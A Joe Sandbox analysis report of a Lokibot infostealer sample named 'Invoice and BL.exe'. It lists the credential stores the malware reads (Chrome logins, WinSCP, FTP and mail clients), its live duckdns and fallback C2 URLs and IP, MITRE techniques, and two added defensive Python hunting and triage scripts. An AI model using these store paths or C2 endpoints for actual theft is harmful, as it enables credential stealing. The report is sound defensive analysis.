Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00406069 GetUserNameW
Source: C:\Users\user\Desktop\Invoice and BL.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Lokibot
Source: Yara match | File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Invoice and BL.exe.397e408.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.289975656.0000000003912000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.289177832.00000000027F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Invoice and BL.exe PID: 1152, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 5412, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl

Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Tries to harvest and steal ftp login credentials
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts

Tries to steal Mail credentials (via file access)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

Tries to steal Mail credentials (via file registry)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0040D069 PopPassword
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0040D069 SmtpPassword
Source: Yara match | File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Invoice and BL.exe.397e408.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.289975656.0000000003912000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.289177832.00000000027F1000.00000004.00000001.sdmp, type: MEMORY
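
The registry keys and the Chrome database listed in this section are the credential stores that the injected RegSvcs.exe walks through one after another. A hunting check for that pattern on an endpoint, written here as an added example (it is neither Joe Sandbox code nor anything from the sample): it consumes Sysmon-style registry/file access events, drops accesses made by each store's own application (the owner process names are assumptions), and flags any other process that fans out across several stores. The events are constructed from the paths in this section.

```python
"""Hunt for one process fanning out across unrelated credential stores.

Added example for this report, not code from Joe Sandbox or from the sample.
Events are Sysmon-style (process image + registry key or file path) and are
constructed below from the paths listed under "Stealing of Sensitive
Information"; the owner-process names per store are assumptions.
"""
import re
from collections import defaultdict
from dataclasses import dataclass

# Credential stores the sample enumerates -> (path pattern, owning process names).
# Owner names are assumptions; matching is case-insensitive on the target path.
STORES = {
    "kitty_sessions":   (r"\\Software\\9bis\.com\\KiTTY\\Sessions", {"kitty.exe"}),
    "winscp":           (r"\\Software\\Martin Prikryl", {"winscp.exe"}),
    "far_ftp":          (r"\\Software\\Far2?\\Plugins\\FTP\\Hosts", {"far.exe"}),
    "classicftp":       (r"\\Software\\NCH Software\\ClassicFTP\\FTPAccounts", {"classicftp.exe"}),
    "blazeftp":         (r"\\Software\\FlashPeak\\BlazeFtp\\Settings", {"blazeftp.exe"}),
    "incredimail":      (r"\\Software\\IncrediMail\\Identities", {"incmail.exe"}),
    "outlook_profiles": (r"\\Windows Messaging Subsystem\\Profiles\\Outlook", {"outlook.exe"}),
    "chrome_logins":    (r"\\Google\\Chrome\\User Data\\[^\\]+\\Login Data$", {"chrome.exe"}),
}
_COMPILED = {name: (re.compile(pat, re.I), owners) for name, (pat, owners) in STORES.items()}


@dataclass(frozen=True)
class Event:
    image: str   # full path of the process performing the access
    target: str  # registry key or file path being read


def classify(target: str):
    """Name of the credential store a target path belongs to, or None."""
    for name, (pattern, _owners) in _COMPILED.items():
        if pattern.search(target):
            return name
    return None


def hunt(events, min_stores=2):
    """Flag processes that read credential stores they do not own.

    Accesses by a store's owning application are dropped as expected noise.
    Any other process gets one finding; it is 'high' when the process touched
    at least `min_stores` distinct stores, which is the stealer fan-out
    pattern rather than a single misbehaving application.
    """
    touched = defaultdict(set)
    for ev in events:
        store = classify(ev.target)
        if store is None:
            continue
        exe = ev.image.rsplit("\\", 1)[-1].lower()
        if exe in _COMPILED[store][1]:
            continue
        touched[ev.image].add(store)
    findings = [
        {"image": image, "stores": sorted(stores),
         "severity": "high" if len(stores) >= min_stores else "medium"}
        for image, stores in touched.items()
    ]
    return sorted(findings, key=lambda f: -len(f["stores"]))


REGSVCS = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
# Constructed events: targets are the keys/files from this report's signature list.
SAMPLE_EVENTS = [
    Event(REGSVCS, r"HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions"),
    Event(REGSVCS, r"HKEY_CURRENT_USER\Software\Martin Prikryl"),
    Event(REGSVCS, r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    Event(REGSVCS, r"HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts"),
    Event(REGSVCS, r"HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts"),
    Event(REGSVCS, r"HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings"),
    Event(REGSVCS, r"HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts"),
    Event(REGSVCS, r"HKEY_CURRENT_USER\Software\IncrediMail\Identities"),
    Event(REGSVCS, r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion"
                   r"\Windows Messaging Subsystem\Profiles\Outlook"),
    # benign noise: the owning browser reading its own store, and a non-credential key
    Event(CHROME, r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    Event(REGSVCS, r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid"),
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f["severity"], f["image"], ", ".join(f["stores"]))
```

Keying on the fan-out rather than on the image name matters because the hollowed host varies between samples (RegSvcs.exe here, any other signed .NET utility elsewhere); a process that is not Chrome, WinSCP or Outlook reading all three of their stores within one run is the stable signal. The MachineGuid query in the same section is deliberately left unclassified: it is the sample's victim identifier, not a credential store, and would only add noise.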

Mitre Att&ck Matrix

Techniques matched by this sample, grouped by tactic (the trailing digits are the signature-count badges as rendered in the report):

Privilege Escalation: Access Token Manipulation 1; Process Injection 211
Defense Evasion: Masquerading 1; Disable or Modify Tools 1; Virtualization/Sandbox Evasion 31; Access Token Manipulation 1; Process Injection 211; Deobfuscate/Decode Files or Information 1; Obfuscated Files or Information 3; Software Packing 11
Credential Access: OS Credential Dumping 2; Credentials in Registry 2
Discovery: Security Software Discovery 121; Process Discovery 1; Virtualization/Sandbox Evasion 31; Account Discovery 1; System Owner/User Discovery 1; Remote System Discovery 1; File and Directory Discovery 1; System Information Discovery 13
Collection: Email Collection 1; Archive Collected Data 1; Data from Local System 2
Command and Control: Encrypted Channel 1; Ingress Tool Transfer 1; Non-Application Layer Protocol 2; Application Layer Protocol 212
No matches: Initial Access, Execution, Persistence, Lateral Movement, Exfiltration, Network Effects, Remote Service Effects, Impact

Behavior Graph

(graph image not reproduced; legend: Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, Visual Basic, Delphi, Java, .Net C# or VB.NET, C/C++ or other language, Is malicious, Internet)


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
Invoice and BL.exe | 59% | Virustotal |
Invoice and BL.exe | 34% | Metadefender |
Invoice and BL.exe | 61% | ReversingLabs | ByteCode-MSIL.Infostealer.PrimaryPass
Invoice and BL.exe | 100% | Joe Sandbox ML |

Dropped Files

No Antivirus matches

Unpacked PE Files

Source | Detection | Scanner | Label
7.2.RegSvcs.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
0.2.Invoice and BL.exe.397e408.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

Domains

Source | Detection | Scanner | Label
abixmaly.duckdns.org | 10% | Virustotal |

URLs

Source | Detection | Scanner | Label
http://kbfvzoboss.bid/alien/fre.php | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://alphastand.top/alien/fre.php | 0% | URL Reputation | safe
http://www.ibsensoftware.com/ | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://alphastand.win/alien/fre.php | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://alphastand.trade/alien/fre.php | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://abixmaly.duckdns.org/binge/fre.php | 13% | Virustotal |
http://abixmaly.duckdns.org/binge/fre.php | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://abixmaly.duckdns.org/binge/fre.phpNg | 0% | Avira URL Cloud | safe
http://www.sakkal.com | 0% | URL Reputation | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
abixmaly.duckdns.org | 192.169.69.26 | true | true | | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://kbfvzoboss.bid/alien/fre.php | true | URL Reputation: safe | unknown
http://alphastand.top/alien/fre.php | true | URL Reputation: safe | unknown
http://alphastand.win/alien/fre.php | true | URL Reputation: safe | unknown
http://alphastand.trade/alien/fre.php | true | URL Reputation: safe | unknown
http://abixmaly.duckdns.org/binge/fre.php | true | 13% Virustotal; Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

Source for every entry unless noted: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmp

Name | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | false | | high
http://www.fontbureau.com | false | | high
http://www.fontbureau.com/designersG | false | | high
http://www.fontbureau.com/designers/? | false | | high
http://www.founder.com.cn/cn/bThe | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | false | | high
http://www.ibsensoftware.com/ (source: RegSvcs.exe, RegSvcs.exe, 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp) | false | URL Reputation: safe | unknown
http://www.tiro.com | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | false | | high
http://www.goodfont.co.kr | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | false | URL Reputation: safe | unknown
http://www.typography.netD | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | false | | high
http://www.founder.com.cn/cn/cThe | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | false | URL Reputation: safe | unknown
http://fontfabrik.com | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | false | | high
http://www.jiyu-kobo.co.jp/ | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | false | | high
http://www.fonts.com | false | | high
http://www.sandoll.co.kr | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | false | URL Reputation: safe | unknown
http://abixmaly.duckdns.org/binge/fre.phpNg (source: RegSvcs.exe, 00000007.00000002.294755116.0000000000F48000.00000004.00000020.sdmp) | true | Avira URL Cloud: safe | unknown
http://www.sakkal.com | false | URL Reputation: safe | unknown
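
The `fre.phpNg` entry above shows the usual problem with URLs carved from process memory: the string runs on into whatever bytes followed it (`carterandcone.coml` and `typography.netD` are the same artifact). Below is an added triage routine, not from the report and not Lokibot code, that carves URL-shaped strings from a dump, trims anything matching the Lokibot gate path `<dir>/fre.php` at the end of that path, de-duplicates, and ranks what is left: gate URLs on a dynamic-DNS host first (the suffix list is an assumption), the other gate URLs next, everything else as noise. The input is constructed from this report's URL tables. The four `/alien/fre.php` URLs are the hardcoded fallback gates that recur across Lokibot samples, and `ibsensoftware.com` is the author URL carried by the aPLib decompression stub the report also flags.

```python
"""Triage URL strings carved from a Lokibot process dump.

Added example for this report, not code from Joe Sandbox or from the sample.
The input below is constructed from the URLs this report lists; the DDNS
suffix list and the gate-path pattern are assumptions made for this family.
"""
import re
from urllib.parse import urlsplit

# Free dynamic-DNS providers (assumption: a short list for the example).
DDNS_SUFFIXES = ("duckdns.org", "no-ip.org", "ddns.net", "hopto.org")
# Lokibot panel gate as seen in this report: one directory, then fre.php.
GATE_PATH = re.compile(r"^/[^/]+/fre\.php", re.I)
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)


def carve_urls(blob: str):
    """Pull URL-shaped runs out of a strings dump; trailing junk stays attached."""
    return URL_RE.findall(blob)


def normalise(url: str) -> str:
    """Cut a carved URL right after the gate path so bytes that followed it in
    memory ('fre.phpNg') are dropped. Non-gate URLs are returned unchanged
    because there is no reliable end marker for them."""
    parts = urlsplit(url)
    m = GATE_PATH.match(parts.path)
    if m:
        return f"{parts.scheme}://{parts.netloc}{m.group(0)}"
    return url


def triage(urls):
    """Return {'c2': [(score, url, host), ...], 'noise': [url, ...]}.

    Gate URLs on a DDNS host score 2 (operator-controlled, resolvable
    infrastructure); other gate URLs score 1; everything else is noise such as
    font-vendor strings carried in embedded resources.
    """
    seen, c2, noise = set(), [], []
    for raw in urls:
        url = normalise(raw)
        if url in seen:
            continue
        seen.add(url)
        parts = urlsplit(url)
        host = parts.hostname or ""
        if GATE_PATH.match(parts.path):
            score = 2 if host.endswith(DDNS_SUFFIXES) else 1
            c2.append((score, url, host))
        else:
            noise.append(url)
    c2.sort(key=lambda t: (-t[0], t[1]))
    return {"c2": c2, "noise": noise}


# Constructed strings-dump excerpt built from this report's URL tables,
# including the junk-suffixed forms exactly as the report shows them.
SAMPLE_STRINGS = "\n".join([
    "http://abixmaly.duckdns.org/binge/fre.phpNg",
    "http://abixmaly.duckdns.org/binge/fre.php",
    "http://kbfvzoboss.bid/alien/fre.php",
    "http://alphastand.top/alien/fre.php",
    "http://alphastand.win/alien/fre.php",
    "http://alphastand.trade/alien/fre.php",
    "http://www.ibsensoftware.com/",
    "http://www.carterandcone.coml",
    "http://www.typography.netD",
])

if __name__ == "__main__":
    result = triage(carve_urls(SAMPLE_STRINGS))
    for score, url, host in result["c2"]:
        print(f"c2 score={score} {url}")
    for url in result["noise"]:
        print(f"noise {url}")
```

Trimming is only safe where the family gives you a known terminator; the gate path is one, a bare vendor hostname is not, so the font-vendor strings are left with their junk and should not be pushed to a blocklist as they stand. The ranking puts the DDNS gate on top because it is the one URL in this set that resolved and was contacted (192.169.69.26), whereas the four fallback gates show 0% reputation and are shared across unrelated Lokibot campaigns, which makes them poor pivots on their own.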

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
192.169.69.26 | abixmaly.duckdns.org | United States | 23033 | WOWUS | true

General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 458970
Start date: 03.08.2021
Start time: 23:24:19
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 6m 43s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Invoice and BL.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 22
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@3/3@3/1
EGA Information: Failed
HDC Information:
• Successful, ratio: 97.1% (good quality ratio 93%)
• Quality average: 76.7%
• Quality standard deviation: 28.9%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 84
• Number of non-executed functions: 21
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
• Excluded IPs from analysis (whitelisted): 168.61.161.212, 40.88.32.150, 52.147.198.201, 20.82.210.154, 23.211.4.86, 40.112.88.60, 13.107.4.50, 51.103.5.159, 80.67.82.235, 80.67.82.211, 20.49.157.6
• Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus15.cloudapp.net, wns.notify.trafficmanager.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, elasticShed.au.au-msedge.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, client.wns.windows.com, fs.microsoft.com, Edge-Prod-FRAr4a.env.au.au-msedge.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, c-0001.c-msedge.net, afdap.au.au-msedge.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, au.au-msedge.net, blobcollector.events.data.trafficmanager.net, iris-de-ppe-azsc-uks.uksouth.cloudapp.azure.com, au.c-0001.c-msedge.net
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time | Type | Description
23:25:50 | API Interceptor | 1x Sleep call for process: RegSvcs.exe modified

                                Joe Sandbox View / Context

                                IPs

                                Match | Associated Sample Name / URL | Detection | Context
                                192.169.69.26 | Samples and listed Products.exe | malicious | abixmaly.duckdns.org/binge/fre.php
                                192.169.69.26 | Bank Payment Transfer for PI. BT-GJ21001 (our PO. 2100002(R).exe | malicious | abixmaly.duckdns.org/binge/fre.php
                                192.169.69.26 | MglhrJiLUL.exe | malicious | 195.245.112.115/index.php
                                192.169.69.26 | On35KJkYT4.exe | malicious | 195.245.112.115/index.php
                                192.169.69.26 | Order_List.xlsx | malicious | dubaisupport.duckdns.org/file.exe

                                Domains

                                Match | Associated Sample Name / URL | Detection | Context
                                abixmaly.duckdns.org | Samples and listed Products.exe | malicious | 192.169.69.26
                                abixmaly.duckdns.org | Bank Payment Transfer for PI. BT-GJ21001 (our PO. 2100002(R).exe | malicious | 192.169.69.26
                                abixmaly.duckdns.org | remittance for USD 8,752.16.exe | malicious | 35.246.120.60
                                abixmaly.duckdns.org | invoice for your ref.exe | malicious | 35.246.120.60
                                abixmaly.duckdns.org | PTI invoice of oc 4f -36..exe | malicious | 35.246.120.60
                                abixmaly.duckdns.org | contract YF8536851-1.exe | malicious | 35.246.120.60
                                abixmaly.duckdns.org | GPxOawyspo.exe | malicious | 35.246.120.60
                                abixmaly.duckdns.org | bank transfer SWIFT.exe | malicious | 35.246.120.60

                                ASN

                                Match | Associated Sample Name / URL | Detection | Context
                                WOWUS | Samples and listed Products.exe | malicious | 192.169.69.26
                                WOWUS | Bank Payment Transfer for PI. BT-GJ21001 (our PO. 2100002(R).exe | malicious | 192.169.69.26
                                WOWUS | PO20171118-COGRAL SPA.jar | malicious | 192.169.69.25
                                WOWUS | New Order_R4.jar | malicious | 192.169.69.25
                                WOWUS | 8MglQ6WLl5.exe | malicious | 45.14.115.62
                                WOWUS | QPqcGLFnyI.exe | malicious | 192.169.69.30
                                WOWUS | Payment Slip.xlsb | malicious | 192.169.69.25
                                WOWUS | AFE7D487324952929F8F037BDFBD7249049086FC8C4A9.exe | malicious | 192.169.69.25
                                WOWUS | 10FCF8DA6000E34F9E8B8B173B6F8A65B6128E2422DB5.exe | malicious | 192.169.69.25
                                WOWUS | IMG_Giris emri 20201122164730_PDF.exe | malicious | 192.169.69.25
                                WOWUS | ORDER-21611docx.exe | malicious | 192.169.69.25
                                WOWUS | 4714D68DBB9F9AC36425F2EC73ED434CF57407F36063C.exe | malicious | 192.169.69.25
                                WOWUS | ORDER-6010.pdf.exe | malicious | 192.169.69.25
                                WOWUS | 9CCC5F07D0BF7152841C893C892DF407C854D5FF45C1A.exe | malicious | 192.169.69.26
                                WOWUS | 0F4F0709D120ABA22D4687BFABFA5004DD54B0FCC6EF1.exe | malicious | 192.169.69.25
                                WOWUS | WNr7kU4wSU.exe | malicious | 192.169.69.26
                                WOWUS | 2ga2LylVIM.exe | malicious | 192.169.69.25
                                WOWUS | AFa8kUgrni.exe | malicious | 192.169.69.25
                                WOWUS | u8SFl9j1I8.exe | malicious | 45.14.115.62
                                WOWUS | 66D9612BA9CDE67EDEA09F3482459F3BFE03FAAA13EAD.exe | malicious | 192.169.69.25

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Invoice and BL.exe.log
                                Process: C:\Users\user\Desktop\Invoice and BL.exe
                                File Type: ASCII text, with CRLF line terminators
                                Category: dropped
                                Size (bytes): 1216
                                Entropy (8bit): 5.355304211458859
                                Encrypted: false
                                SSDEEP: 24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                MD5: FED34146BF2F2FA59DCF8702FCC8232E
                                SHA1: B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                SHA-256: 123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                SHA-512: 1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                Malicious: true
                                Reputation: high, very likely benign file
                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
                                Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                File Type: very short file (no magic)
                                Category: dropped
                                Size (bytes): 1
                                Entropy (8bit): 0.0
                                Encrypted: false
                                SSDEEP: 3:U:U
                                MD5: C4CA4238A0B923820DCC509A6F75849B
                                SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
                                SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                Malicious: false
                                Reputation: high, very likely benign file
                                Preview: 1
                                C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\414045e2d09286d5db2581e0d955d358_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                                Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                File Type: data
                                Category: dropped
                                Size (bytes): 414
                                Entropy (8bit): 0.6553179628425584
                                Encrypted: false
                                SSDEEP: 3:/lbOllbOllbOllbOllbON:O
                                MD5: 5D9D7B3222A4B52C61F455AFA027CAE4
                                SHA1: 36BF394ABFBAF545FD187CE75BC76750CB0E3A08
                                SHA-256: 7B86820B53F41B8F9DD41C3F6F564796DA458F672AEB7EBA03C422252846B551
